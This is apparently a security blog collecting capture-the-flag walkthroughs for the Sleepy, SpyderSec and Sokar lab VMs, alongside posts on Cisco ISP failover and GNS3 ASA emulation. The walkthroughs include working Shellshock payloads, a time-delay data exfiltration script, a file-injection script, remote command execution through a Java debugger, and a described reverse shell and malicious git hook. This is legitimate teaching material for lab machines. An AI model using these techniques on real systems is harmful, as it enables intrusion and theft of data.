/dev/random: Sleepy

Looks like I’ve got time to write up another recent VM challenge before the memory fades. This time, it’s the boot2root challenge Sleepy by Sagi-.

I really like this one because it took me back to my University days of Java development. Then I hated it because it took me back to doing acrobatics with I/O readers, buffers, streams, etc. the Java way. Then when I completed it I loved it.

On with it then!

Initial scanning

Starting off, a full TCP SYN scan produces three open ports.

TCP 21 is FTP, and it allows anonymous login:

Anonymous is rightly jailed and there’s only an image to download:

sleepy

I thought that the image might hold some essential information or clues, but I wasn’t able to find any. Not sure if it’s a motif or a red herring.

Assuming FTP’s a red herring, attention turns to the other two open ports. Running a service scan on the ports might confirm what protocols they’re offering:

So with ajp13 confirmed as Apache Jserv, I guess we’re looking at something Tomcat-based. Probably the first thing to start work on.

At this stage I had never heard about Java Debug Wire Protocol, but a quick search tells me it’s a remote Java debugger.  This should be great. I still like working with Java, so if I get to play around with a debugger I’ve never seen that’s cool.

Dealing strictly with Apache Jserv first, however…

AJP

As AJP has accidentally been left open to the world, it might be possible to exploit the system, for example by injecting malicious code to the server. In order to control it, though, I need access to some Tomcat management interface to test it.

Exploiting an open AJP is pretty well documented by others so I’ll not go into too much commentary on it. I needed to set up Apache on my machine and add the Apache jk modules. Then, by configuring jk to forward requests – not to my local server, but to the victim – it should be possible to try to get management access.

libapache2-mod-jk provides the following files:

The default Apache website needs to forward all requests to JK, and JK needs to be configured to forward requests to the victim.

After restarting Apache, it’s possible to connect to http://localhost/ and see all of the Tomcat goodies including /manager/ and /host-manager/ on the victim. However, the passwords are not the defaults and attempting a few passwords didn’t prove successful.

Tomcat

Getting access is going to require viewing the administrative passwords – often stored in plaintext – from the server.

The Java debugger

The JDWP port can be attached to with the jdb command, which provides a remote debugging shell. It’s not a shell with the breadth of control that a terminal would provide – everything has to be done via Java execution – but hopefully with enough libraries exposed something can be conjured up.

The help is pretty good for jdb. The classes command outputs a list of all classes that are available to the running program, and classpath shows that we seem to be running Java 7…

Above we’ve got a hell of a lot of Java standard library classes available, plus a class which is named without a long package name – luciddream. This is presumably the author’s work, and given the Sleepy theme, that’s a fair guess.

It’s unfortunately not possible to just execute arbitrary Java from the prompt:

Instead control of execution needs to be seized by the debugger. The main class has only one function other than main and the constructor:

Setting a breakpoint on snore() and waiting eventually gives us control, and at that point we can execute any arbitrary Java code we want, using the available classes:

Great! So, with all of the java.io classes we can potentially exfiltrate file data from the victim, or possibly even inject data. Also, with java.lang.Runtime we’ve got access to the runtime and can execute arbitrary commands.

The thing is, executing a command will merely return the object representing the new process, not the output of the command. For example, running whoami:

To actually get output from the command, some I/O acrobatics are required. Working with what we’ve got (and I’m probably not doing it in the most efficient manner), we’ve got the following return values and methods to link up.

  • exec() returns an object of type Process; let’s call it p.
  • p.getInputStream() returns an object of type InputStream, i.
  • Ultimately we’re looking to get a String, s, which can be output to the console.
  • Out of the many readers available, BufferedReader, r, offers the method readLine(), which returns a String, s.
  • A BufferedReader, r, can be instantiated with an InputStreamReader, ir.
  • An InputStreamReader, ir, can be instantiated with an InputStream, i, which we got earlier.

Got that? Good.

  • exec() gives us Process p
  • p.getInputStream() gives us InputStream i
  • new InputStreamReader(i) gives us InputStreamReader ir
  • new BufferedReader(ir) gives us BufferedReader r
  • r.readLine() gives us String s
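
Chained together, that’s the expression handed to jdb’s print command. Here’s a throwaway helper that spells it out (a reconstruction of the expression, not the original session):

    # Not the original session, just a helper that prints the jdb expression
    # described above. The output is what gets pasted at the jdb prompt once
    # the breakpoint on snore() has been hit.
    def reader_chain(command):
        # Fully-qualified class names, because jdb expressions have no imports.
        return ('new java.io.BufferedReader(new java.io.InputStreamReader('
                'java.lang.Runtime.getRuntime().exec("%s").getInputStream()'
                ')).readLine()' % command)

    print('print ' + reader_chain('whoami'))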

Putting this into practice, we can attempt to run whoami again:

Unfortunately things get a bit more complicated when the result of the command is multiple lines. We only get one call to readLine() on the BufferedReader, so only the first line of output can be retrieved. e.g. ls -la produces a weak result:

To get full output, line feeds need to be replaced with another string – e.g. by using awk ORS=’something’ – and in order to build more complicated commands with pipes and so on, we need a command processor, e.g. bash.
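
The flattening trick itself can be demonstrated locally with a quick bit of Python (a sketch only; the separator character is an arbitrary choice, and this is plain subprocess rather than the jdb incantation):

    # Hand the whole pipeline to bash -c and let awk's ORS turn newlines into a
    # marker character, so the result comes back as a single line that one call
    # to readLine() can swallow.
    import subprocess

    result = subprocess.run(
        ["/bin/bash", "-c", "ls -la / | awk 'ORS=\"~\"'"],
        capture_output=True, text=True)
    print(result.stdout)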

Voila:

Using this method I did a search for files with tomcat in the name and got the following (edited) list:

Dumping this file gives us the passwords we require (again, edited for reading):

Credentials

TomcatManager

Exploiting Tomcat

Exploiting isn’t the right word here, as we own Tomcat now. We can easily get control as the Tomcat user with Metasploit and the credentials (remember that the rhost/target is our own machine, as we’re attacking the victim through our Apache server):

We’ve now got a reasonable user shell on the system.

Privilege escalation

It’s getting quite late and I don’t want to make an already verbose walkthrough too much longer. In summary, the following items were found in further investigation and lead to privilege escalation.

First of all the machine is vulnerable to shellshock:

This may seem counter-intuitive when we already have a shell, but it will become essential later.

Furthermore, there is an executable /usr/bin/nightmare that has the SUID bit set and is owned by root. Since this runs as root, if we can get it to run something arbitrary, then we can gain access as root.

I found the Meterpreter session to be extremely unstable for what happens next – I kept getting disconnected – so I uploaded nc to the victim and opened a reverse shell back to my machine:

And locally on my machine we can get a decent interactive shell:

nightmare needs some better terminal emulation configured, so this can be set up by setting environment variable TERM to ‘linux’ and using Python to spawn a proper tty. (FYI, to enter Ctrl-C in the terminal enter Ctrl-V first; this allows the Ctrl-C to be sent through to the remote host’s control instead of killing the Meterpreter session.)
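
The tty part is the usual Python trick, run on the victim from the netcat shell after exporting TERM=linux:

    # Equivalent one-liner: python -c 'import pty; pty.spawn("/bin/bash")'
    import pty
    pty.spawn("/bin/bash")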

Here’s what happens when /usr/bin/nightmare is executed normally:

Decompiling nightmare with Hopper, it’s easy to see what it’s doing. main() runs a loop (sub_4008d0()) which repeatedly calls fire(), which executes the command /usr/bin/aafire, the program responsible for animating the ASCII-art fire. The option to quit the program at the y/n prompt is ‘broken’, but pressing Ctrl-C enters sigHandler(), which calls train(), which executes /usr/bin/sl – the executable responsible for the ASCII-art train. Crucially, however, this call sets the real/effective/saved UIDs and GIDs to root, preventing a reduction in privileges, which is exactly what we need if we can exploit Shellshock through it.

After finding a method to exploit that I hadn’t seen before, it was possible to get a root shell and get the flag.

Done!

SpyderSec: Challenge

I can’t believe it’s been nine months since my last post. I must have been busy. Or lazy.

Just as well I recently completed SpyderSec‘s nice little X-Files themed encryption challenge to get me out of my blog funk.

This was a really fun one, and totally worth a look if you’re interested in video steganography. This is a walkthrough to how I completed the challenge, so if you fancy trying yourself look away now.

Flag #1

The challenge spec already makes clear that this is a web application challenge and a full nmap TCP scan confirmed that only port 80 was open. The web page served doesn’t reveal too much:

Website front page

Just in case an administrator left some content or administration pages open, I scanned the host with dirb.

Search turns up a /v/ directory, but this is Forbidden.

Looking at the html source of the page reveals some packed JavaScript:

You can dump this packed program into one of a few public JavaScript unpackers, but I wanted to see if it would evaluate fine in nodejs, which it did:

The hex values appeared to be ASCII characters, so I tried converting to a string and got some interesting output:
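
The conversion itself is trivial; something along these lines (the hex values here just illustrate the interesting part of the result):

    # Decode a run of hex character codes into ASCII. The sample values below
    # spell out the string discussed next; the real output contained more.
    hex_codes = "6d 75 6c 64 65 72 2e 66 62 69".split()
    print("".join(chr(int(h, 16)) for h in hex_codes))   # -> mulder.fbi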

I wasn’t sure what to make of “mulder.fbi” at this point. Plugging it into the dirb search didn’t turn up any hidden content.

Plugging away at the page for a while, I turned to look at the logs of the requests I had made in BurpSuite. I noticed that the page was including a cookie and that it mentioned a URI:

I already knew of the /v/ directory, so it stood to reason that there was a good chance I would find something interesting if I accessed this location directly. However, I was disappointed to find that the URI was also a forbidden location:

The challenge was beginning to feel very much like a hidden data exercise. I tried plugging various strings I had captured into the web server to see if I could find something. I can’t remember how long it took, but eventually putting the URI together with ‘mulder.fbi’ caused the web server to offer me a 13MB file:

A cursory examination of the file showed it as a video file.

Flag #2: Kill Switch

The video turned out to be a song with lyrics slides. (The song incidentally is a reference to an episode of The X-Files – I had to look that up.)

At this point I figured that there was something hidden in the video file. Hidden data – particularly where video is concerned – is really not my strong suit. I searched the file for strings (which didn’t help) and for container metadata (didn’t find any). On a hunch I decided to run the file through a video processor. I asked the program to make a direct stream copy of the audio and video, meaning that the whole content would be copied without recompression into a new file. If there was any hidden data in the file, it might reveal a difference in file size.
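
The comparison amounts to something like this (the post doesn’t name the video processor, so ffmpeg is assumed here, and mulder.fbi is the name the download was saved under):

    # Copy the audio/video streams without re-encoding and compare sizes; a
    # large difference suggests data sitting in the container outside the
    # streams.
    import os
    import subprocess

    subprocess.run(["ffmpeg", "-i", "mulder.fbi", "-c", "copy", "copy.mp4"],
                   check=True)
    print("original:", os.path.getsize("mulder.fbi"))
    print("copy:    ", os.path.getsize("copy.mp4"))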

Several megabytes of data were missing from the stream copy, but the file played exactly the same; a strong indication that there was data to be found in the file. Since the data was not part of the video and audio streams, I felt I had a chance with this. (If the data had been hidden as data in the streams themselves then my chances of success would have been much lower.)

Still, I don’t really know much about video container formats, so I took the path of least resistance and did some web searches first of all. Actually, doing a search for "hide data in mp4 video" turns up some pretty interesting stuff immediately. (That link is seriously worth a read if you’re interested.)

Working on the hunch that the video file contains a TrueCrypt encrypted volume, the challenge essentially becomes “find the correct password”. And the thing about TrueCrypt volumes is that they’re practically indiscernible from random data. All you can do is keep trying passwords until one works and even if you never find one that works, you will never know whether the data is actually random or you’ve just not found the correct password.

Anyway, you probably know where this is going. Eventually (it took too long) I found the password. I can’t remember exactly when I turned my attention to the website images (I had already gone over the BurpSuite logs several times to no avail, and was considering writing or searching for a tool to automate TrueCrypt password attempts), but at some point I dumped the webpage content and started looking for strings.
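
That strings pass is nothing more sophisticated than this sort of thing, run over the downloaded page content and images:

    # Pull printable runs of 8+ characters out of a file and eyeball them for
    # anything password-shaped.
    import re
    import sys

    data = open(sys.argv[1], "rb").read()
    for match in re.findall(rb"[ -~]{8,}", data):
        print(match.decode("ascii"))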

The password was hidden in the metadata in the following file:

SpyderSec Challenge.png

And there we have it. The TrueCrypt password is A!Vu~jtH#729sLA;h4%. After that, getting to the final flag is a breeze…

SpyderSec TrueCrypt password

SpyderSec TrueCrypt volume mounted successfully

SpyderSec challenge completed

Sokar: VulnHub anniversary competition

VulnHub just turned two, and to celebrate, they held a three week competition. The subject is Rasta Mouse‘s challenging VM, Sokar, which features multiple interesting and very recent vulnerabilities.

The challenge took me quite a few hours; much longer than the three hours that someone reportedly finished under. However, I did some interesting things, so please read on if you are interested in Python scripting, time-delay based exfiltration, file injection through unusual channels, memory forensics, password cracking, and how a client application (Git) can badly bite you in the butt.

Initial scanning

It’s usually pretty safe to get heavy handed with a new VM; no administrators are watching and it’s usually the quickest way to find the attack vectors…

OK, so we’ve got one lonely port, and this is what it’s showing…

Selection_010

There’s nothing particularly exploitable-looking about the page. It takes no user input, and it appears to be presenting pretty static information. Refreshing the page does not update the contents (a list of connections output from netstat); instead they are updated periodically, probably by some cron job on the server.

The page contains an iframe which executes /cgi-bin/cat on the server but, as the name suggests, this is probably just outputting a specific file on the server that we have no control over.

My first thought at this stage was, if this is exploitable, and it takes no user input, and it’s a CGI, then it’s probably a Shellshock vulnerability (Bashbug’s a far better name though).

I sent a test the server’s way to see if I could get execution.

Well, that’s a bit of a bummer. Am I getting commands to be executed or not? I need a time-based test:

A delay; great! I’m definitely executing commands on the server (note that the absolute path needs to be used), but I can’t figure out how to get data returned.
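
The probe itself is just a pair of timed requests along these lines (a sketch; the address is a placeholder and the CGI path is the one identified above):

    # If the request with the sleep payload takes noticeably longer than the
    # baseline, the injected command is being executed.
    import time
    import urllib.request

    TARGET = "http://192.168.56.101/cgi-bin/cat"   # placeholder address

    def probe(payload):
        req = urllib.request.Request(TARGET, headers={"User-Agent": payload})
        start = time.time()
        try:
            urllib.request.urlopen(req, timeout=30).read()
        except Exception:
            pass
        return time.time() - start

    print("baseline:", probe("() { :;}; /bin/true"))
    print("sleep 5 :", probe("() { :;}; /bin/sleep 5"))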

This is where I might have previously given up, but after writing an ICMP exfiltration script for Persistence last year, I decided to write a program to exfiltrate data from the server using time delays.

The conspicuous machine gun timing script

Later on I found out that I didn’t really need to do all of this, so this might make me look a bit stupid, but I definitely think I get some points for style here.

Here’s the script – exfil.py – which will exfiltrate the response of an arbitrary command on Sokar using repeated queries and delays to slowly drip out the data at about 10 bits per second. =) (Note that you may need to tweak the parameter exfil_delay to suit your network latency and VM performance. Higher is more accurate and reliable, but obviously slower.)
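
The original script isn’t reproduced here, but the core idea is captured by the following condensed sketch (placeholder address, and much simplified compared to the real thing):

    # For every bit of every byte of the command's output, send a request whose
    # payload sleeps only if that bit is set, then recover the bit from the
    # round-trip time. exfil_delay is the tunable mentioned above.
    import time
    import urllib.request

    TARGET = "http://192.168.56.101/cgi-bin/cat"   # placeholder address
    exfil_delay = 2                                # seconds; tune for latency

    def timed(payload):
        req = urllib.request.Request(
            TARGET, headers={"User-Agent": "() { :;}; " + payload})
        start = time.time()
        try:
            urllib.request.urlopen(req, timeout=exfil_delay * 5).read()
        except Exception:
            pass
        return time.time() - start

    def leak(command, max_len=40):
        result = ""
        for pos in range(max_len):
            byte = 0
            for bit in range(7):                   # ASCII fits in 7 bits
                payload = ('v="$(%s)#"; c=${v:%d:1}; n=$(printf "%%d" "\'$c"); '
                           'if [ $(( (n >> %d) & 1 )) -ne 0 ]; then /bin/sleep %d; fi'
                           % (command, pos, bit, exfil_delay))
                if timed(payload) > exfil_delay:
                    byte |= 1 << bit
            if byte == 0 or chr(byte) == "#":      # '#' marks end of output
                break
            result += chr(byte)
        return result

    print(leak("/usr/bin/whoami"))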

And here’s the output from running exfil.py:

Not very fast, and it also contains some errors: 2 minutes to get a short directory listing. Pretty fun though. Of course, a network with an IPS or an observant administrator would probably shut down the server before I could get any further.

So I went on my merry way, getting directory listings at a very slow rate as the apache web server process, until I found my next clue.

(It’s also worth stating here that this exfiltration script will only work for information that remains static. Getting a listing of a directory that was rapidly changing, or the contents of a changing file, would require script modifications.)

The scarequote to end all wars

There are two users on the server: bynarr and apophis. The former’s home directory is open to other users…

lime is a script that I have execute access to. I decided to run it to see what it is, and I was surprised to find that, without my exfiltration script, it will output data over Bashbug:

I exfiltrated the contents of the script to find out what was special about it. Turns out that it echoes a single double-quote at the start.

Is this a quirk of Bashbug that everyone knows except me? Perhaps; this is the first time I’ve exploited it. Anyway, it means I can throw away the script and just use curl again, which is far quicker; all I need to do is output a double-quote before any command I need output from.

The unbearable lightness of Bynarr

I proceeded with further information gathering at a faster speed, until I found that bynarr’s email is readable and provides some clues…

This is actually really great news, as I had already been attempting to gain a reverse shell from the server under the apache user, but all network communications appear to be blocked. This is evidence that a network connection can be made by bynarr over TCP port 51242. Though, did they mean source or destination port? (Answer to come later.)

Uploading arbitrary files

Before trying to mess around with reverse TCP connections, I decided to make a script that would allow me to inject files onto the server. Here’s inject.py for your pleasure:

This script will take any file as an argument and place it in the /tmp/ directory of Sokar, using multiple 50-Base64-byte chunks.
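
Again, not the original script, but the mechanism boils down to something like this (placeholder address; absolute paths on the remote side, as noted earlier):

    # Base64 the local file, push it over the Bashbug vector in 50-byte chunks,
    # then decode it into /tmp/ on the far side.
    import base64
    import sys
    import urllib.request

    TARGET = "http://192.168.56.101/cgi-bin/cat"   # placeholder address

    def run(payload):
        req = urllib.request.Request(
            TARGET, headers={"User-Agent": "() { :;}; " + payload})
        try:
            urllib.request.urlopen(req, timeout=10).read()
        except Exception:
            pass

    def inject(path):
        name = path.split("/")[-1]
        data = base64.b64encode(open(path, "rb").read()).decode()
        run("/bin/rm -f /tmp/%s.b64" % name)
        for i in range(0, len(data), 50):
            run('/bin/echo -n "%s" >> /tmp/%s.b64' % (data[i:i + 50], name))
        run("/usr/bin/base64 -d /tmp/%s.b64 > /tmp/%s" % (name, name))

    inject(sys.argv[1])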

Getting an interactive shell

Things we need:

  • A reverse shell:
  • The ability to run commands as bynarr. For this we will use pexpect, which we will inject onto the server
  • A script to interact with pexpect, allowing us to su to bynarr and execute the reverse shell:
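
Sketched with placeholders (the password and the name of the uploaded reverse-shell script are stand-ins, not the real values), the pexpect part looks something like this:

    # Drive su with pexpect and launch the reverse shell as bynarr.
    import pexpect

    child = pexpect.spawn("/bin/su", ["bynarr"])
    child.expect("[Pp]assword:")
    child.sendline("<bynarr password>")          # placeholder
    child.sendline("/bin/bash /tmp/shell.sh")    # assumed name for the reverse shell
    child.expect(pexpect.EOF, timeout=None)      # hold the session open while the shell runs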

(By the way, this answers the earlier question about whether TCP 51242 is the source or destination port. I discovered through trial and error that from Sokar’s perspective TCP 51242 must be the destination. I think, therefore, root was being a bit disingenuous when using the word ephemeral which would usually imply what the source port should be. =))

All three of the above files are uploaded to the server and run (once we make sure that we have a waiting socket on the attacking machine to accept connections!).

Ta da! Got a connection. I check the id and quickly improve the shell I’ve been given:

The Limey

With the interactive shell, we revisit the lime script in /home/bynarr. The script allows the loading or unloading of a kernel module called lime.so:

Execution of insmod is usually restricted to root, but we can suspect that if it’s been placed there by root then bynarr’s been given sudo rights to run it.

Doing some research on LiME reveals that it’s a forensics kernel module that allows extraction of the entire contents of system memory. Fantastic. This creates a 256MB file at /tmp/ram which I need to get off the server for offline analysis.

We’re already using the only IPv4 port that can allegedly be used for connections, and 256MB is too much to dump to the terminal in Base64 encoding. I could kill my connection and upgrade to a Meterpreter shell, but I’d rather keep my tool use to a minimum.

The choice of a new generation

I noticed earlier that Sokar has IPv6 enabled:

What are the chances that the administrator didn’t take the same precautions about IPv6 connections that were taken for IPv4? I ping my attacking machine from the victim:

Looks promising. I’ll just upload ftp (it’s not on the server):

And then upload the file for analysis from Sokar:

Memory hunting

There’s a lot of information to trawl through in the RAM dump (have a look if you don’t believe me).

Having already wandered around the server quite a bit by this point – and having found that everything felt quite secure (i.e. no services to exploit, no misconfigurations, no vulnerable kernel) – I was convinced that it was actually just password hashes that were needed and that the next target was either the apophis user or root directly.

Opening up ram in hexedit and performing some searches (e.g. ‘shadow’, ‘passwd’, ‘password’) provided many many results, but a search for ‘apophis’ yielded the fastest return with a copy of the /etc/shadow file:

Selection_011

I added the hashes to a file and ran john against them using the RockYou password list. After not very long, I got the password for apophis:

BOOM! Let’s have a look what’s in apophis’s home:

Ok, we’ve got an ELF executable, which is run as root, and which appears to be trying to access another server called sokar-dev.

What’s he building in there?

Taking a copy of build off the server to disassemble reveals that the main part of the executable is encrypted. However, by debugging the program, we can discover quite easily what it’s doing:

This tells us that the program gets root to execute:

It’s not immediately clear how this could help, as cloning a repository is a safe routine. If it wasn’t, then there would be hundreds of nefarious projects tricking people into executing exploitative code, right?

But I had a niggling doubt, so I decided to check the CVE database for git vulnerabilities, bearing in mind that Sokar has git version 2.2.0.

Well it turns out that Git 2.2.0 has a vulnerability. The CVE appears to be undetailed as of writing, but it’s been publicised elsewhere since 18th December.

You git

Essentially, if a user checks out a nefarious repository with Git version 2.2.0, it is possible for an attacker to get arbitrary command execution. This only affects case-insensitive file systems, so Linux should really be safe. However, the location we’re going to be checking out to – /mnt/secret-project/ – is on a vfat volume, which is case-insensitive:

The end is in sight. First we need to get Sokar to recognise our attacking machine as sokar-dev. As luck would have it, /etc/resolv.conf is world-writable!

We add a DNS zone file to BIND on the attacking machine, and of course we get sokar-dev to resolve to us. I’ll provide both IPv4 and IPv6 addresses just in case the administrator opened the IPv4 firewall just for this purpose. (Although, I’m pretty sure that IPv6 wouldn’t work anyway, as the addresses we have are only link-local addresses and the interface/scope ID would need to be specified in the git command.)

An evil repository

The git clone command is vulnerable because we are able to take control of the user’s git configuration. The simplest way to abuse that is to plant a post-checkout hook, one the user never created, that will execute an arbitrary command.

The command we will run is:

i.e. add full sudo privileges for user apophis.

To do so, we create an evil repository with a post-checkout hook in the .GIT/HOOKS directory.

To show the creation of a bad repository, I’ve made a quick video. The working location is root’s home directory on the attacking machine; that is the location that the victim’s root user is going to connect to in order to retrieve the repository.

Privilege elevation

All that leaves is to clone the repository, which will in turn check out the HEAD revision, write a hook to .git/hooks/post-checkout, and execute it…

Iptables

Just for completeness, here’s the iptables configuration that prevented all connections except bynarr‘s outgoing connections to destination TCP port 51242, root‘s outbound SSH connections to sokar-dev, and the server’s outbound DNS queries.

Conclusion

This was a great challenge. There were lots of steps covering many unrelated areas and it didn’t feel contrived. After my last big challenge, which mainly concentrated on binary exploitation, it was nice to attack a machine that was mainly vulnerable through tools and configuration. It’s close in spirit to the machines in Offensive Security’s PWK course.

It would have been nice if there had been an additional step required to modify /etc/resolv.conf; that was the only bit that felt a little unlikely. Despite that, it still proved to be very time-consuming and frustrating (in a good way), and I highly recommend trying it even now that the competition has closed.

Thanks again to Rasta Mouse and g0tmi1k from VulnHub for the great work on this. Please feel free to leave any comments or questions.

High availability Internet connectivity on a budget

This post was originally written back in 2012 in my previous job. I’ve reposted it here in case it’s of any use in the future.

How can you improve Internet connectivity for an office on a budget?

This was a problem we had recently for a customer of ours. The customer did not have the budget for a highly available Internet connection from an ISP. Their existing service was a standard business/consumer cable connection that met all of their needs most of the time and was about all they felt they needed to pay for. However, they needed to insure against the occasional outage that is not uncommon for such a service (one or two hours a month, say). Spending thousands of pounds was not an option on the table.

The service did indeed fail every few weeks, but the provider had been unable to improve reliability, and so the choice remained: tolerate the problem or look for an alternative, more reliable provider.

However, the customer already had a Cisco 1811 ISR router (circa £600) which would be able to provide route failover if only there was a second Internet connection.

The solution we offered and implemented was to install a second low cost Internet connection from another supplier, and to implement IP SLAs to handle failover. The existing router had all of the features required using only static routes and without any routing protocols.

Two ISPs connected to one router
The planned configuration

The following post is very Cisco oriented, but similar features may be available with alternative vendors’ equipment.

Basic configuration

The cable connection was the fastest, and so that would be the active connection. The DSL connection would be redundant and only come into use when failure of the cable connection occurred.

The DSL connection was tested and then connected to a free Layer 3 port on the router. It was added to the routing table thus:

The lower metric for FastEthernet0 means that all traffic will be routed out of that interface unless the interface is administratively down. However, if the interface is up and the ISP has a failure upstream, then the connection will not automatically fail over. More on that later.

Address translation and route maps

Outgoing connections need to be translated to the correct public IP address depending on what route is taken. (This is in contrast to higher availability solutions where the IP addresses might be rerouted.) The existing NAT rules were simply duplicated for the new connection. Here, using route maps, the connection is translated to the correct IP address depending on which interface the connection leaves:

At this stage, the failover can be tested by manually shutting down FastEthernet0. (It may also be necessary to clear the NAT translation table.) All being correct, Internet connection should remain available.

IP SLAs

The final step to providing failover is remarkably simple.

First, a suitable upstream IP address needs to be found for each connection to monitor for availability. Your ISPs have probably provided equipment that serves as the next hop. However, monitoring those devices is not suitable, as they will remain available when the connection has failed further upstream.

Perform a trace route for each connection to determine a suitable test candidate. Here, upstream routers have been identified that can be monitored for availability.

Traceroute can be used for each connection to identify the upstream routers on the service provider network.
Service provider routers identified for monitoring *

Now, SLA rules can be defined to monitor the two connections.

Above, two separate SLAs have been configured. Each independently pings the upstream routers every 5 seconds, and notes a problem if there is not a response within 1 second (1000 ms). However, we want to avoid invoking a failover if the disruption is short, so the connection must be down for 15 seconds before a failure will be declared. We also want to avoid flapping of the connection (a link that drops and comes back every minute causes more frustration than it solves), so a failed state will only end after 120 seconds without a timeout.
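
Just to make the hysteresis concrete, here is a toy model of the tracked-object behaviour described above (a sketch only, nothing Cisco-specific):

    # Probes run every 5 seconds; the track goes down after 15 seconds of
    # consecutive failures and only recovers after 120 seconds without a timeout.
    FREQUENCY, DOWN_AFTER, UP_AFTER = 5, 15, 120

    def track_states(probe_results):
        """probe_results: one boolean per 5-second probe."""
        state, bad, good = "up", 0, 0
        for ok in probe_results:
            bad, good = (0, good + FREQUENCY) if ok else (bad + FREQUENCY, 0)
            if state == "up" and bad >= DOWN_AFTER:
                state = "down"
            elif state == "down" and good >= UP_AFTER:
                state = "up"
            yield state

    # Three missed probes (15 s) trigger failover; recovery needs 120 s clean.
    print(list(track_states([True] * 4 + [False] * 3 + [True] * 30))[-1])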

You can now check the current status with the ‘show track’ command, which should show ‘Reachability is Up’ for each connection. To put the rules into effect, the routing table must be modified to reference them. In the following, the routes have been altered to reference the track objects, and so a failure will cause the route entry to be disabled.

One more thing…

Once a failover does occur, the route is effectively gone from the routing table. That applies equally for traffic originating from the router as it does for traffic going across it. That includes the monitoring traffic. To allow the router to detect the resolution of a service outage after a failover, explicit routes need to be added to the routing table for each monitored router:

You now have a simple failover between two basic Internet connections using standard features available in most Cisco IOS routers, while avoiding the use of routing protocols and expensive availability solutions from service providers.

Results

So far, in the last two months the primary connection (which is the fastest and preferred, but unfortunately the less reliable) has been down on three occasions for an average of 3 hours each time. Already the improvements have paid off.

In future articles I will elaborate on expanding the configuration to include load-balancing traffic to make better use of the redundant connection, and how incoming traffic for services such as web and email can continue to be served during a service provider failure.

* There are caveats with this post’s selection of router to monitor. If the ISP has a failure somewhere further upstream then your monitoring will fail to notice it. Alternatively, if the ISP reorganises the network and the router you were monitoring is removed, the monitoring will incorrectly believe the connection is down. These problems must be considered on a per connection basis and may need to be solved with the assistance of the particular service providers involved.

Emulating a Cisco ASA in GNS3

I originally wrote a post with this title for my last employer’s website 2 years ago. It was pretty popular for some reason (perhaps because information about ASA emulation was a lot less common than it is now), so I decided to revisit it and update it if required.

Back at the time, I was working on an upgrade of a pair of critical Cisco ASA firewalls from version 8.2 to a version greater than 8.3; this is a major upgrade that changes the commands for NAT significantly.

Cisco have incorporated a migration script into the upgrade process that attempts to convert the old 8.2 commands to 8.3 syntax. However, it’s not perfect and some configurations will just not migrate without intervention.

Having initially attempted the upgrade on the standby ASA, I found that the automatically generated configuration produced by the upgrade was causing undesirable behaviour. The ASA was rolled back, but not before taking a copy of the configuration. Being unable to purchase another ASA for lab testing, I loaded the bad configuration into an emulated ASA in GNS3, and through trial and error the new quirks in ASA configuration were corrected and the problem solved in the live environment.

Preparation

An excellent script by dmz at 7200emu.hacki.at (repack.v4.sh.gz) is necessary. This will take an ASA image and separate it into two files – a RAM disk and a kernel image. (Register and login to be able to download it.)

You will also need the Cisco ASA 8.4(2) image (asa842-k8.bin), as that is the image that the repack script is designed for. I did not attempt to use or remodel the repack script for other ASA versions, so that’s an interesting challenge for another day.

On a Linux system (I’m using Linux Mint 17, which should be very similar in behaviour to Ubuntu 14.04), run the script against the image. (The script needs to be run as root to avoid errors from cpio, so run it at your own risk.)

Keep two of the files produced:

  • asa842-vmlinuz
  • asa842-initrd.gz

Since Linux is what I work in these days, I’m mainly interested in getting GNS3 working there, but I was unable to get it to work without a programming assertion failure. As I had no such problems in Windows, and I will probably rarely or never need to emulate an ASA again, that will suffice.

Windows guide

GNS3 has had quite a few updates since 0.8.3. Now at version 1.1, the installer includes WinPcap and Wireshark by default. I’ll assume that the GNS3-1.1-all-in-one.exe installer has been run with at least the default packages.

Once installed, open GNS3 and in Edit > Preferences > QEMU > QEMU VMs, create a New VM.

Name the VM whatever you want, but set the Type to ‘ASA 8.4(2)’. The default Qemu binary of qemu-system-x86_64w.exe is fine, as is the 1024MB of RAM. Choose the initrd and vmlinuz binary files created earlier, and then save the VM preferences.

The completed VM should look something like this:

GNS3 1.1 QEMU VM Configuration

Now, having created the VM definition, simply drag an ASA device into a topology; you should now be able to start it, connect to the console, and make connections just like any IOS device…

ASA successfully booted in GNS3 on Windows

Linux guide

As already mentioned above, I was unsuccessful getting a working solution in Linux, but I will put one here if I ever get one.

(It’s possible that I was making problems for myself by not downloading the latest versions of GNS3 and Qemu. I prefer to use the distro packages wherever possible.)


wopr decompiled

This post is a follow-up to my Persistence post, and is only of interest to people who really want to compare my decompiled C with the disassembled wopr binary.

Here follows the disassembled wopr executable, with my decompiling comments interspersed.

I glossed over error handling; wopr’s handling of failures (such as failure to open sockets) is completely ignored, and only a best-case scenario is examined.